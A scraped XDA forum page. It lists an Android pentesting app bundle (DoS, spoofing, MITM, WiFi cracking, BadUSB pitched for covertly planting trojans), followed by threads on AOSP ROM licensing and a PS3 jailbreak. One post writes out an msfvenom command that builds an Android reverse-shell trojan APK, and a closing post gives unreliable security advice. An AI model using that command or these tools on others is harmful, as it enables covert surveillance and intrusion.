PenTesters_Paradise ~ Take Your ROM to the Next Level - Verizon Galaxy S 5 Themes and Apps

PenTesters_Paradise
DISCLAIMER
I can not be held responsible for how you use this package.
I am also not to be held responsible if flashing this package
damages your device in any way. This package is for
educational use only and should not be taken lightly. This is
the exact package that I use for my 2nd job, and is not meant
to just be played with willy nilly. Ask permission before doing
anything in public OR private.
PenTesters_Paradise
This package was originally supposed to be a custom ROM, but I wanted to give everyone an equal opportunity to enjoy this package, so I converted it to something everyone can use! This package isn't for the faint of heart. This is for those of you curious about Pen Testing and for those who basically want to feel like they're bringing Watch_Dogs to the real world. Below I will explain the package, and what each item can actually do. I will also have YouTube videos (when I get the time to record them) explaining each app and package. I also have some custom content coming, some that will be shown off and not released as well. Please enjoy and remember to play it safe and always ask permission first before using any of these packages or tweaks.
What's A Pen Tester?
If you're asking yourself this question, this package MIGHT NOT be for you. A Pen Tester is either a White Hat or Grey Hat hacker that gets hired by individuals or companies to basically purposely hack their products, networks, or any other sorts of electronically based applications. Pen Testers are becoming a big deal especially in the Gaming world. Dev companies are starting to get smart and are realizing that they honestly can't BEAT the hackers without TRUE HACKERS of their own. This is slowly becoming a big money lifestyle and more and more people want into it. This is basically your "License to Kill" when it comes to a product/project/etc. when the company or individual gives you the green light to crack in and have at it.
Package Includes
Screen Shots will be added to the 3rd post of this thread, tutorials for each app and the change log to the 2nd.
AnDOSid
This app is an Android-based DOS attacker. Basically, this app allows you to simulate a DOS attack (Denial of Service) as an HTTP POST flood attack on either another person or a web server.
NetSpoofer
Network Spoofer lets you change websites on other people’s computers from an Android phone. Simply log onto a Wifi network, choose a spoof to use and press start. This can be a lot of fun, but always ask first.
AndroidVNC
Please see this thread for all the info about this:
http://forum.xda-developers.com/showthread.php?t=497187
aWPScan
This app lets you scan WordPress based sites for exploitable entrances to the site's admin panel. Fairly simple to use and can sometimes come in handy when working for a client and building them a WP based site.
DroidSheep and FaceNiff
These apps were popular for a very short time but are very powerful. They both kind of have the same functions as they work as a MITM (Man In The Middle) attacker service. Basically, login to any WiFi hot spot, and you will start capturing web traffic. You can manipulate the web traffic to do as you want from here.
DroidSheep Guard
This app guards you from anyone else using Droid Sheep. I'm not entirely sure if it will guard against FaceNiff as well.
DriveDroid
This app turns your device basically into a disc image mounting device. Basically, you can take an ISO or IMG file, mount it with this app, and install full operating systems to another PC. Read below on how to work it with the Galaxy S5 specifically, as there's 1 special step you need to know.
1.) Run the app and go through the setup.
2.) When you get to the selection about selecting a driver, select the 3rd item, which should be a "Legacy USB Driver"
3.) When you get to the point about TESTING it and restarting your PC, this is where the trick lies.
3a.) As your PC boots up, boot directly to your BIOS (for HP and ASUS it's either Escape or F2. Not sure about others off the top of my head)
4.) From here, make sure your phone has connected successfully in MTP mode.
4a.) Go into Drive Droid (After MTP has been set), and select the IMG or ISO you wish to emulate from your device.
4b.) In the BIOS, Save Settings and restart (I know you didn't change anything, hear me out)
5.) From here, you need to test...
5a.) You'll either (after the bios loading screen) boot directly to the ISO or IMG, or into your standard OS.
6.) If you boot directly to your standard OS, reattempt from step 3 onwards, but at step 5, go to 6a
6a.) When the PC restarts, bring up your Boot Menu of options (F12 I believe on ASUS and HP)
6b.) From here, select the Samsung device listed, and it should boot!
dSploit
dSploit is a package of all sorts of tools ranging from MITM attacks to DOS attacks, and other testing abilities. Plenty of videos around on how to use this app.
HackAppData
This is for any app on your device. This app lets you modify the AppData of any application installed on your device.
Hackers Keyboard
Just a highly customizable keyboard.
Network Mapper
This app simply maps out the WiFi Network you are currently connected to, showing you every device connected.
Shark
Basically WireShark for Android. Lets you see incoming and outgoing data packets from your device and other things on the network.
Penetrate Pro
No this isn't a dirty joke (couldn't resist), This app works with decoding WiFi connections to allow you to connect to locked and private connections.
SQLMap
SQLMap is one of the most highly used tools around for SQL Injection attacks as it's basically the best automated tool for it. There's tons of tutorials out there about it and soon I'll post one of my own.
LockScreen Widgets Tweak
Created by BigBot96, this tweak lets you apply Widgets to your lock screen. PLEASE Make sure you download the correct file. Currently, only the NE9 builds are supported with this tweak, but I'll have an option available for you to not have to worry about this.
Coming Soon...
Future Additions will be coming around soon for this, so keep checking the thread!
Kali Linux NetHunter Features.
So far, only supported by the Nexus devices, I'm attempting to port over the apps and data for this to the S5 as the first non-Nexus device to have support for Kali Linux control. Below will be the list of what will be included.
KaliLauncher
This is the heart of the NetHunter features. This controls everything, and launches all the different exploits available through Kali Linux. To learn more, keep reading
BadUSB
BadUSB is a form of undetectable Malware that is applied to specific USB devices that match the exploit. Basically, this hijacks your USB plug while your device is connected to a computer (windows based), and lets you install a faulty driver to it that houses your malware files. You could use this to transfer things like BotNets, Trojans, and many other forms of malware to a users system and they'd never even know.
DNSSpoofer
Basically, this tool just spoofs the DNS connection you're using or the other person/s are using and lets you reroute people. DNS Attacks are few and far between, but they're slowly getting easier.
PowerSploit
I'll admit, I haven't read up on this yet, but when I have, I'll edit this lol.
NoUpStream
This stops any up stream data entirely.
Other Future Additions
Basically, I'd like to convert this to something like a "Mini-ROM" that gives you a Launcher, themed Gapps, themed system apps, and much more, but for now, this is the temp solution. Next Update should have at least a custom boot animation.
How-To Install
1.) Transfer the Zip file that matches your device to your SD card or Internal Storage
2.) Boot up into recovery mode and Flash the ZIP
3.) Done!
Special thanks to the creators of all these apps, scripts and tweaks that are being applied to this package. The ZIP packages below simply just need to be flashed to your Android device via SafeStrap (only method I can test). If someone could test a standard TWRP on a Dev Edition or another unlocked device, that'd be awesome.
Download Links Below
UPLOADING NEW ONES AFTER THE NEXT FLASH Test.
Thought it was ready, and realized it wasn't.

All apps are force closing -_- I'll fix it when I wake up. I've been at it for 12 hours now

Planning on updating this/adding a download?

Nice waiting anxiously for this

Waiting like wagging dog.... I went to source and got working nice..like to wait for add ons.
http://forum.xda-developers.com/showthread.php?p=3518324

Subscribed.
Sent from my SM-G900V using Tapatalk

lol he posted this weeks ago.. he's responding in his rom thread also saying he was working on a new rom which isn't out yet and said a week or two ago that his tmo buddy got 5.0 lollipop which was false lol so not sure if and when this will actually be uploaded.. it's been here for weeks with no zip or apks at all in the themes n apps section..
most of these apks are stuff you can manually install if you don't want to wait :-/

Reinventing the wheel
Kali nethunter had been out for a while for the S5 variants, it's like having a VM copy of Kali on your galaxy S5 the instructions/apps/kernel are all available
http://forum.xda-developers.com/galaxy-s5/unified-development/kali-nethunter-galaxy-s5-t3298477 all the other apps he's talking about are available just search on Google or download an app called bugdroid pro from the app store it provides downloads and installs for all of these.
Faceniff
Droid sheep
I don't think those function anymore on anything.. I'm pretty sure those security holes they exploit have been patched..

dmayniak said:
Kali nethunter had been out for a while for the S5 variants, it's like having a VM copy of Kali on your galaxy S5 the instructions/apps/kernel are all available
http://forum.xda-developers.com/galaxy-s5/unified-development/kali-nethunter-galaxy-s5-t3298477 all the other apps he's talking about are available just search on Google or download an app called bugdroid pro from the app store it provides downloads and installs for all of these.
Faceniff
Droid sheep
I don't think those function anymore on anything.. I'm pretty sure those security holes they exploit have been patched..
lol the last comment was me about 2 years ago

elliwigy said:
lol the last comment was me about 2 years ago
i know right? lol i gave up on this because at the time i sucked at making flashable zips

Vortell said:
It would be cool if you started it back up!
The reason I haven't is because Kali Linux has an official release for this phone as long as your bootloader is unlocked and you're on CM

Related

[ROM] AOSP w/o Google apps (readd-able) FIRST HALFLEGAL ROM

Here I provide a half legal (I included the HTC drivers for the hardware...) stock AOSP (android-1.5_r3) ROM!
You can add Google Apps legally if you have bought a Google experienced phone by running this script on a linux-machine:
http://forum.xda-developers.com/showthread.php?t=564744
Features:
-No special features
-Just stock w/o Google apps
Download for G1:
http://www.4shared.com/file/135524283/e812c64f/dream.html
Instructions:
Unzip the file, then:
fastboot erase userdata
fastboot flash system system.img
fastboot flash boot boot.img
fastboot reboot
To Do:
I'm a lazy guy.
Next release will be cyanogenmod w/o googleapps.
Well, does the ROM work without all the Google stuff?
Can we add them easily ?
Thanks for the new build, hope this googles' issue will be fine
It does work, but it's nearly useless.
I work on a windows version of my script which adds google apps legally.
I also will create a script for recovery.
I'll work on this ROM when I'm done with these, as soon as the scripts are ready, this ROM will get some goodies from Cyan.
Nice work Maxisma!
Its a good start
awesome bro
keep it up it's a start!
maxisma said:
It does work, but it's nearly useless.
I work on a windows version of my script which adds google apps legally.
I also will create a script for recovery.
I'll work on this ROM when I'm done with these, as soon as the scripts are ready, this ROM will get some goodies from Cyan.
Excellent.
With all this doom and gloom.
Surely this is the problem solved?
But what do you mean by google experience?
I know I got all the apps with my phone... T-Mobile G1...
Google Experience are all phones with Google Apps preinstalled.
Just some indian and russian HTC devices don't have it.
Out of interest would this boot fine without running the script?
I am presuming not, but i am just curious?
I would try it out, but at the moment I am not at home and only have 2g coverage on my phone so its a bit slow to download
Edit //
Could i (in theory) install, boot and then use wget to download sam3 from slideme.org and then download a third party dialer / K9 etc... etc..
So use all third party apps
vixsandlee said:
Out of interest would this boot fine without running the script?
I am presuming not, but i am just curious?
I would try it out, but at the moment I am not at home and only have 2g coverage on my phone so its a bit slow to download
It boots fine w/o the script ;-)
Not to rain on your parade, but ....
Hi Maxisma,
Not to rain on the parade, but ...
Per Google, this ROM is no more "legal" than any other ...
The following is taken from http://source.android.com/documentation/building-for-dream
* The Dream device software contains some proprietary binaries. For contractual reasons, these cannot be redistributed separately from the shipping hardware, but the provided script may be used to extract these binaries from your development device so that they can be correctly included in your build. These libraries include the openGL|ES library, the Qualcomm camera library, the HTC Radio Interface Library, etc. You need adb to be in your path, and you need your device to be configured for adb access. If you don't have adb already, do a generic build first, which will put it in your path.
Just my understanding of things.
~enom~
Interesting, i am going to have to have a look and a play later.
Cheers for the work (forgot to say that in my first post)
if you're interested on maybe trying to do this on your own:
http://www.johandekoning.nl/index.php/2009/06/07/building-android-15-build-environment/
Contrary to what you might think, a ROM w/o google apps is not entirely useless. Probably the major setbacks are the lack of market access, the lack of a YouTube player (we need to work on a port of Totem's Youtube implementation but for android), and a way to manage contacts (irrenhaus is looking at the possibility of setting up a Google Contacts sync), plus we'd probably need to write a utility to actually read/write contacts to and from SIM.
G-mail, you can access from the browser (which, AFAIK, is still free and open source under the Apache Licence), Maps can be downloaded once we get Market access.
Other than that, a bone-stock android build will keep you connected to the internet, allow you to tether, allow you to run scripts, deliver your mms, give you camera and music player, have theme support, and of course, make phone calls just like any other build will. You'll just have to go a bit out of your way to get apps, but again, that's the main drive here, either get access to market or create a new one and invite app developers to submit their apps there too.
enomther said:
Hi Maxisma,
Not to rain on the parade, but ...
Per Google, this ROM is no more "legal" than any other ...
The following is taken from http://source.android.com/documentation/building-for-dream
Just my understanding of things.
~enom~
That's dead on too, and I forgot about it. The issue would not be with google anymore though, but with HTC and its hardware partners. This is what cyanogen realized, now that the spotlight is on rom development, companies will have watchdogs for re-distribution of binary code. If you own an ADP device, you can legally download the binaries from the HTC website and MAKE YOUR OWN BUILD (so redistribution targeting dream is out, unless we can talk to HTC about it), either that, or, as I've said before, move onto an open hardware platform so we can write our own drivers.
---edit---
By the way, I still don't agree with the whole feeling of gloom floating around here. This is only a change to the way we're doing things right now, but it doesn't hinder development in any way. If you're the kind of dev that's here for the praise, then yeah, you won't like it that now people will have to actually know what they're doing, so your fanbase will be reduced. I for one welcome the change. This rom, for example, can still be distributed without the HTC binaries and maybe have instructions for the user to download them, install them in their OTA package, and then actually flash the rom. But then that requires that people actually know what they're doing, since we can't legally provide them the finished product.
Also, it doesn't hinder improvement of the platform. None, I repeat, NONE of cyanogen's or other dev's work ever even touched the proprietary parts of the build, as this is nearly impossible without the source (I know, baksmali, but really, I'm trying to make a point here!...) and most of what made his work awesome was the behind-the-userland work; kernel's bfs patches, scripting, cpu time management, modifications to available source, for example, the settings package.
We can still improve the platform, we can contribute, and maybe this time around the way Google wanted people to, by submitting code for their consideration to have it maybe implemented in android's next build.
I'll be glad to see all the "OMG, MY PHONE WONT START" threads diminish as people realize that this will no longer be the place where you get it all dumbed down and easy to use.
hey just by simple curiosity, how do you then log into the phone, if this rom is google less? I presume you still need a google account to set up your machine right????
kmassada said:
hey just by simple curiosity, how do you then log into the phone, if this rom is google less? I presume you still need a google account to set up your machine right????
You don't need to login as there is no setupwizard.
jubeh said:
That's dead on too, and I forgot about it. The issue would not be with google anymore though, but with HTC and its hardware partners. This is what cyanogen realized, now that the spotlight is on rom development, companies will have watchdogs for re-distribution of binary code. If you own an ADP device, you can legally download the binaries from the HTC website and MAKE YOUR OWN BUILD (so redistribution targeting dream is out, unless we can talk to HTC about it), either that, or, as I've said before, move onto an open hardware platform so we can write our own drivers.
---edit---
By the way, I still don't agree with the whole feeling of gloom floating around here. This is only a change to the way we're doing things right now, but it doesn't hinder development in any way. If you're the kind of dev that's here for the praise, then yeah, you won't like it that now people will have to actually know what they're doing, so your fanbase will be reduced. I for one welcome the change. This rom, for example, can still be distributed without the HTC binaries and maybe have instructions for the user to download them, install them in their OTA package, and then actually flash the rom. But then that requires that people actually know what they're doing, since we can't legally provide them the finished product.
Also, it doesn't hinder improvement of the platform. None, I repeat, NONE of cyanogen's or other dev's work ever even touched the proprietary parts of the build, as this is nearly impossible without the source (I know, baksmali, but really, I'm trying to make a point here!...) and most of what made his work awesome was the behind-the-userland work; kernel's bfs patches, scripting, cpu time management, modifications to available source, for example, the settings package.
We can still improve the platform, we can contribute, and maybe this time around the way Google wanted people to, by submitting code for their consideration to have it maybe implemented in android's next build.
I'll be glad to see all the "OMG, MY PHONE WONT START" threads diminish as people realize that this will no longer be the place where you get it all dumbed down and easy to use.
I could probably write a Java application that would allow the user to:
1) hook their google phone up over USB and grab the existing google apps off of it
2) point to the location of their proprietary drivers on a manufacturers website for download
3) point to a central location of legal ROMS for download
4) click an ASSEMBLE button to put it all together. The resulting update file would be like they have always been, but no illegal redistribution has taken place.
One little problem ...
Ohsaka said:
I could probably write a Java application that would allow the user to:
1) hook their google phone up over USB and grab the existing google apps off of it
2) point to the location of their proprietary drivers on a manufacturers website for download
3) point to a central location of legal ROMS for download
4) click an ASSEMBLE button to put it all together. The resulting update file would be like they have always been, but no illegal redistribution has taken place.
Hi Ohsaka,
One little problem with that is ... the manufacturers do not post the drivers (standalone) on their websites for download, they only redist with the hardware. Also, there are other library files as well, it's not only drivers.
~enom~
Simple fix.. just don't include it. People will have to "magically" find the drivers on their own.
If it boots, why is it nearly useless?

[DEV]PSFreedom Android [Bravo|N1|G1|Sapphire|EVO|HD2|Wildfire

EDIT 2 (6/09/2010):
Success at last!!!
Now confirmed working on numerous devices
Check http://psfreedom.com/wiki/index.php?title=Device_compatibility_list for compatibility.
Check http://www.github.com/psfreedom for source
DESIRE INSTALLATION INSTRUCTIONS
http://psfreedom.com/wiki/index.php?title=OpenDesire4.0.4
N1 INSTALLATION INSTRUCTIONS
http://psfreedom.com/wiki/index.php?title=Nexus_One
HTC DREAM/G1/Magic INSTALLATION INSTRUCTIONS
http://psfreedom.com/wiki/index.php?title=G1
HTC SAPPHIRE INSTALLATION INSTRUCTIONS
http://psfreedom.com/wiki/index.php?title=Magic32A
HTC EVO INSTALLATION INSTRUCTIONS
http://github.com/kakaroto/PSFreedom (NO BINARY AVAILABLE YET BUT THIS DOES WORK)
HTC WILDFIRE INSTALLATION INSTRUCTIONS
http://www.ps3underground.net/esclusiva-port-del-psfreedom-su-htc-wildfire/
HTC HD2 (ANDROID PORT) INSTALLATION INSTRUCTIONS
http://bit.ly/bPZf0C
Other MSM72K devices among numerous others are still being worked on. If you can in any way help please join #psfreedom on IRC.FREENODE.NET (By help I mean if you are a kernel developer or think you can offer some form of useful assistance, asking for status updates may get you kicked off the channel).
HSUSB Devices (Check the compatibility list) have not yet begun development. We are searching for a HSUSB developer to assist in the project, please join #psfreedom on irc.freenode.net if you are.
FAQ
Q: What is all this about hacking the PS3?
A: A few weeks ago, someone released a USB tool that allows you to switch any PS3 into "dev" or "debug" mode. The long and short of this means that the PS3 has finally been hacked and homebrew is a real possibility. After a lot of clever reverse engineering, the hack was documented and distributed under the name "PS3Groove". Some clever people ported that code so that other USB devices could be used for this purpose. It just so happens that your smartphone is also a USB device and this was a project to port THAT code so that your Android smartphone could be used to hack your PS3.
Q: Cool! Where do I start?
A: Slow down there, cowboy. This is pretty technical stuff, if you've come here from another forum, or are unfamiliar with terms like "recovery", "flashing", "rooting" and such, take a deep breath and look around the forums for more information, as any mistakes could brick your phone.
First, you'll need to know if your device is compatible. There is a list of android devices maintained here: http://psfreedom.com/wiki/index.php?...atibility_list
This will tell you if your device is supported, as well as point you to where to go if it is.
Q: Ok, so I have a supported device, now what?
A: Just owning the device isn't enough. You'll need to root it to enable you to install custom ROMs. Once you're confident about installing custom ROMs, you're ready to rock and roll! Now, this IS the Desire dev forum, so from here on I'll assume you have a HTC desire, rooted and ready to go. If you have a different device, refer to the link above, or look on your device's own forum.
Q: What ROMs are compatible with this?
A: If you thought that you might need a specific ROM - you'd be right! The whole hack revolves around the kernel that's loaded into the ROM. Essentially, this means that not all ROMs will be able to do this. Right now, if you're looking for an easy solution, install OpenDesire. CyanogenMOD may well work, too, as well as ROMs based off either of those, but no guarantees or promises are made.
Q: What about Sense ROMs?
A: Unfortunately, this isn't feasible. HTC have yet to release the source code for Sense 2.2, which means we can't port this into it. So if you have a ROM that you like running sense, you'll have to make a choice - Sense, or PS3 hacking? There's no middle ground with this. Alternatively, you can just nandroid between the two ROMs, however you'll soon see how tedious this can get =P
Q: Ok I've got Open Desire installed, now what?
A: Opendesire by itself is just a damn good ROM, not a lean, mean, PS3-hacking machine, so you'll need to add something else. The details are kept here, but essentially there are two update zip files. One will "enable" the PS3 hack and one will "disable" it. You flash those files directly over the ROM itself, using your favourite recovery.
Q: BDMV or Homebrew?
A: In order to keep PSgroove away from Sony's legal team, they released it without the ability to play backup PS3 games, only PS3 homebrew (to which there is currently very little, but stay tuned!), they did this by disabling BDMV. So there are TWO "enable" files. One is "Homebrew", which is a direct port of the PSGroove code and will not play backup games and the other is "BDMV", which will play both PS3 homebrew AND backups.
Q: Did you say BACKUPS?!
A: Yer darn tootin' I did! Legal backups, of course. One of the few pieces of homebrew available is the Backup Manager. This is a simple application that will let you backup a GAME THAT YOU OWN onto an internal or external USB hard drive, then play it without the disk. You'll still need a disk in the drive, but any PS3 game will work.
Q: Where do I get Backup Manager?
A: Backup manager is built with the PS3 SDK, which means it's technically illegal software, so you won't find it on this site, but it really isn't hard to find with a bit of googling. Whatever you do, don't ask for it here!
Q: Hey guess what, I found a copy of backup manager, how do I use it?
A: Ok, so before you start, do yourself a checklist:
You'll need -
Rooted phone,
running a ROM with the PS3groove code loaded onto it (e.g. open desire with klutsh's enable zip flashed on top of it),
USB cable plugged into your PS3 going to the phone.
Phone switched on and on the home screen.
A PS3 running Firmware 3.41 (support for earlier Firmwares will come later, but don't ask when).
Make sure there's no disk in the drive.
Step 1: POWER OFF your PS3 COMPLETELY. This means flipping the switch off at the back of it (if it's a PHAT PS3) or UNPLUGGING it if it's a SLIM PS3.
Step 2: Switch it back on and IMMEDIATELY press the "disk eject button". When I say immediately, I mean it - you've got 0.2s to press it!
You'll notice your PS3 takes longer to boot, a few extra seconds. Once it has booted, you'll notice under GAME, you'll have a couple of extra options.
Step 3: Plug in your USB drive with manager.pkg on it, then select "* Install Package File". Select manager.pkg and it'll install, giving you a new Icon.
Step 4: Backup manager is now installed. Run it and put a disk in the drive. You'll see it appear in the list and it'll give you an option to back it up. It'll first ask if you want the external drive, then it'll ask if you want to install it to the Internal drive. More on that later.
Now, go make yourself a cup of tea. In fact, make several, Blu-ray disks are frickin' huge and take time to backup.
...................
Ok, so the game is backed up. Go ahead and put it back in its box, where it'll be safe from harm. Now, get yourself ANOTHER PS3 game, any game at all and put it in the PS3. In backup manager, you'll see both your disk game and the backed up game. Select the backup game and press "X".
You'll now be kicked back to the XMB. But look at the disk icon. It should be showing you the game you backed up, NOT the game in your drive. You'll need a legit PS3 game in your drive for this to work, you'll also need to make sure you're running BDMV enable, or it won't work (it'll still show you the game in the drive).
Q: Sounds great! But what's the catch?
A: Actually, there are several. For one, the external hard drive must be FAT32, or it won't be detected by the PS3.
Because of this, any games that have files greater than 4Gb won't work (for example, God of War III), you'll need to install it onto the INTERNAL drive.
Even then, some games may not work at all. Luckily, there are a few lists showing which games work, which don't and which only work on the internal drive.
Oh and some games require you to delete all of their savegame data before they'll load. Sorry.
Furthermore, things like DLC, patches, etc. tend to not work, but this is very early days at the moment, so sit tight!
Q: What's this I hear about "stealth" backups?
A: Quite simply, everyone is expecting Sony to want to protect their precious PS3, which will likely come in the form of a banwave for anyone doing this. Make no mistake, do not assume for a second that you won't get banned for doing this. Still, some people believe that they might be safer if they use a "stealth" Backup Manager. This is simply a version of Backup Manager that tries to make it look like you're playing a different game, like MW2. So far, despite rumours to the contrary, Sony hasn't banned anyone yet, so nobody knows just how detectable it all is.
I'm hoping something comes of this, but I wouldn't get TOO excited, the developer of this is only 15 and while I'm sure he's quite talented, he's still quite young so it could take him a while, assuming it's possible at all.
Still, I like the guy, he makes no promises, doesn't pretend to be anything he isn't and makes it quite clear what he is and isn't capable of. He's essentially said "I'll give it a shot!" and that's good enough for me.
Sorry for the double post, but there's an update on this:
http://netzke.blogspot.com/
This guy is working on an Android port and, from what he's posted, he's not far off.
I sent the kid a donation, looks like he already has the PSGroove part of the app working.
@ neoKushan, what does age have to do with anything? i know a few kids who are 15-18 who are smarter than half the people i have met on XDA, Including myself.
there is a version compiled for the n900. i have it and it works,would be good if someone could compile for desire? it is open source
abc27 said:
eavpsp is already working on this and we should offer him all the help that XDA has to offer.
He's been exposed as a fake, unfortunately. There's a story on the front page of ps3hax about it.
I'd donate to Netzke if I had some good hard evidence that he's genuine but so far I haven't seen anything.
Relikk said:
He's been exposed as a fake, unfortunately. There's a story on the front page of ps3hax about it.
I'd donate to Netzke if I had some good hard evidence that he's genuine but so far I haven't seen anything.
I'm aware. At the time I posted many people believed he had something genuine in store.
To be honest, porting over the N900 version mightn't be all that difficult.
Juggalo_X said:
I sent the kid a donation, looks like he already has the PSGroove part of the app working.
@ neoKushan, what does age have to do with anything? I know a few kids who are 15-18 who are smarter than half the people I have met on XDA, including myself.
I'm merely trying to point out that at 15, even if he's extremely talented, he's still quite inexperienced. From reading his twitter, he doesn't pretend otherwise. I completely support the guy and wish him well and by no means want to make it sound like he's a n00b or anything, I'm simply saying that he's young is all.
what does bring a jailbroken android to us?
cCeT said:
what does bring a jailbroken android to us?
It's not the android phone that's being jailbroken, it's the Playstation 3 being jailbroken through the use of an Android phone.
cCeT said:
what does bring a jailbroken android to us?
I believe this is actually a software clone of the PSjailbreak exploit which has been re-engineered to be run off of our Android devices. I.E., Put your Android phone in "PSjailbreak Mode" and then connect to PS3, it would then perform the same functionality that having the actual USB device/dongle would provide.
A marvellous idea and one that I would love to try out once the tool reaches a stable version. I'm sure over the next week or so we'll see who can actually port it and who is just 'fronting'.
I'll be subscribing to this thread for sure!
**EDIT** Seems neo beat me to the answer!
I've uploaded the binary files used on the N900 so we can get to work on the Android port.
It comprises of a kernel module and two shell scripts.
If what the other guy who's doing the android port says is true, you don't need a special kernel or anything to do this, just root access. Who knows how true that is, though.
Would be nice to see some collaboration from some devs here who know what they're doing lol
if this happens then its gonna be awesome!!
Finally region free BR!!
Netzke is obviously a scammer looking for a quick buck... he mentions in every post that 15$ will get beta access.
Yes, it looks like a scam to me too.
Anyway, looking forward to get the N900 version ported to Android (someone on PSX Scene said we just need to compile the source for the kernel of our phone)
It does appear to be all that's needed. It's a portable kernel module according to the dev. He's releasing the source later today so we wait in earnest.
Make that source release tomorrow, depending on time zone.
Was pushed on line just before he went to bed.
As for netkaz, he's scamming, first claim was donations for a server.
I offered up a full server for free for the life of the project, no response, now he's going to start on an iPhone port after he can afford an iPhone.
eavpsp, well his own private chat room was leaked, he was getting other devs to do all the work then planned to put his name to it.
The dev that is showing most promise at the minute is qberty1337.
But as already said, once the n900 kernel module source is out it should not take too long.
The PSP porting effort is a farce to be honest. We just need that N900 source code and we can get going.
Klutsh said:
Make that source release tomorrow, depending on time zone.
Was pushed on line just before he went to bed.
As for netkaz, he's scamming, first claim was donations for a server.
I offered up a full server for free for the life of the project, no response, now he's going to start on an iPhone port after he can afford an iPhone.
eavpsp, well his own private chat room was leaked, he was getting other devs to do all the work then planned to put his name to it.
The dev that is showing most promise at the minute is qberty1337.
But as already said, once the n900 kernel module source is out it should not take too long.
That's good to hear.
I hope someone is able to create a BR region free app for PS3 now!!

VULNERABILITY IN ALL Android Devices

Code:
This is just for Educational Purpose nothing else .......
So while I was learning about Linux, I came to know that there is a distro of Linux called Kali Linux. Kali Linux basically has 300+ hacking tools and has the
Metasploit framework in it. Basically it will either create a Windows Trojan or an Android Trojan. I researched it a bit and came to know about typing the following in the Terminal.
Code:
msfvenom androidmeterpreter/reverse_tcp LHOST=YOUR IP LPORT=ANY3/4DIGITS R > anyname.apk
This command compiles and creates an .apk containing the payload.
When installed on an Android device it is installed as MainActivity.apk.
It can access a phone's contacts, SMS logs, call logs, MICROPHONE, CAMERA!!!, device tree, contents of the device, keylogs etc...
It is a light trojan (not more than 0.3 MB) and can run in the background unnoticed. This information from your device is streamed to the hacker and compromises your security. So never download unknown APKs from the web.
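A defensive triage check for the situation this post warns about, added here as an example (not code from the thread or from any tool it names): it lists the permissions an APK requests and flags a small package that asks for several of the capabilities listed above. The permission grouping, the size and count thresholds and the sample manifest bytes are assumptions constructed for the example, and the scan is a string heuristic over AndroidManifest.xml, not a full binary-XML parser.

```python
import io
import re
import zipfile

# Real Android permission names, grouped by the capabilities the post lists.
# The grouping itself is an assumption made for this example.
SENSITIVE_GROUPS = {
    "contacts": {"android.permission.READ_CONTACTS"},
    "sms": {"android.permission.READ_SMS",
            "android.permission.RECEIVE_SMS",
            "android.permission.SEND_SMS"},
    "call_log": {"android.permission.READ_CALL_LOG"},
    "microphone": {"android.permission.RECORD_AUDIO"},
    "camera": {"android.permission.CAMERA"},
}
SMALL_APK_BYTES = 512 * 1024  # assumed cut-off for a "light" package
REVIEW_THRESHOLD = 3          # assumed: this many groups triggers a review

_PREFIX = "android.permission."
# Compiled manifests usually store strings as UTF-16LE; some use UTF-8.
_UTF8_RE = re.compile(re.escape(_PREFIX.encode("ascii")) + rb"[A-Z0-9_]+")
_UTF16_RE = re.compile(
    re.escape(_PREFIX.encode("utf-16-le")) + rb"(?:[A-Z0-9_]\x00)+")


def extract_permissions(apk_bytes):
    """Return the set of android.permission.* names found in the manifest."""
    try:
        with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
            manifest = zf.read("AndroidManifest.xml")
    except zipfile.BadZipFile as exc:
        raise ValueError("not a ZIP/APK container") from exc
    except KeyError as exc:
        raise ValueError("no AndroidManifest.xml in archive") from exc
    found = {m.decode("ascii") for m in _UTF8_RE.findall(manifest)}
    found |= {m.decode("utf-16-le") for m in _UTF16_RE.findall(manifest)}
    return found


def triage(apk_bytes):
    """Summarise requested permissions and decide whether to review by hand."""
    perms = extract_permissions(apk_bytes)
    groups = sorted(g for g, names in SENSITIVE_GROUPS.items() if perms & names)
    small = len(apk_bytes) < SMALL_APK_BYTES
    if len(groups) >= REVIEW_THRESHOLD:
        verdict = ("review: small package, broad access" if small
                   else "review: broad access")
    else:
        verdict = "ok"
    return {"permissions": sorted(perms), "groups": groups,
            "small": small, "verdict": verdict}


def build_sample_apk(permissions):
    """Constructed test input: a ZIP whose manifest holds UTF-16LE strings.

    This is not a valid compiled manifest, only enough for the string scan.
    """
    blob = b"\x03\x00\x08\x00" + b"".join(
        p.encode("utf-16-le") + b"\x00\x00" for p in permissions)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", blob)
        zf.writestr("classes.dex", b"constructed placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_apk([
        "android.permission.INTERNET",
        "android.permission.READ_CONTACTS",
        "android.permission.READ_SMS",
        "android.permission.READ_CALL_LOG",
        "android.permission.RECORD_AUDIO",
        "android.permission.CAMERA",
    ])
    print(triage(sample))
```

A "review" verdict only means the package deserves a closer look before installation; legitimate apps such as messengers request the same permissions.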
By default, /system/app has a stock app called DefaultContainer.apk (fixed).
All Android devices have a DRM server and DefaultContainer.apk.
One day I thought: "What if I disable this app?"
Well, good question:
The answer is (when trying to install by brute force or PackageInstaller with DefaultContainer.apk disabled)
Result:
Unable to install package...
No exploits like this will be done in little time soon.
Sent from SomeFon
Either Google Inc., or AOSP must ensure that the exploit of this nature mustn't be happening in the future...
Can you post a link to the exploit's documentation on Metasploit? I'm running Kali on my MacBook and my Android tablet - and I don't see how that exploit is still open. Looks closed based on quite a few security & OS upgrades since it was found.
yawn... you might as well have titled this "Water found in ocean"
For starters android is awesome and very very flawed (like most 10/10 chicks you will ever meet). This has been a media circus for like 10 yrs now I think.... especially as of very recently we have all concluded that android isn't secure enough to order pizza online (seriously). Every few months there's a headline "huge vulnerability detected in Android patch unavailable but uhhh coming soon" (5 yrs later)
As for Kali, it's the successor or second edition to Backtrack linux. These are distros specifically made for penetration testing. Basically it's another tool for network security experts to assess the condition of a network's known vulnerabilities that haven't been patched yet. Using metasploit you are able to scan a network to find any unpatched bugs and then it will apply the exploit for you. Also I assure you it is much more complicated than typing one command into a box.... one day lol ohhh and those pentesting distros (backtrack is now retired) are nothing special... it is just a basic version of linux that comes preinstalled with a TON of basically every security app you would ever want. It is generally not recommended to run kali as your personal OS especially if you are teh noobcakes..
Don't use blackmart app.
This a dangerous malware masked as
Paralel market
DonT use ANY MARKET APP
TRY cut by BRUTEFORCE YOUR DEVICE and delete urgent all that is gogle's apps!!
These apps are sending randomic authenthic .jar files and .dex files, to execute these binaries from the cache folder of these damn "markets"
